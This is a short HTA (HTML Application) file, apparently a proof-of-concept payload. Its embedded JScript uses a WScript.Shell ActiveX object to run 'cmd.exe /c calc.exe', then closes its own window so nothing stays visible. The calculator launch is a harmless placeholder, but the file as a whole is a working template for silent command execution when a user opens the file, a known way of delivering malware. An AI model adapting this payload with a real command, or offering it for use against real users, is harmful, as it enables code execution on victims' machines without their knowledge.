<html> <head> <HTA:APPLICATION ID="HelloExample"> <script language="jscript"> var c = "cmd.exe /c calc.exe"; new ActiveXObject('WScript.Shell').Run(c); </script> </head> <body> <script>self.close();</script> </body> </html>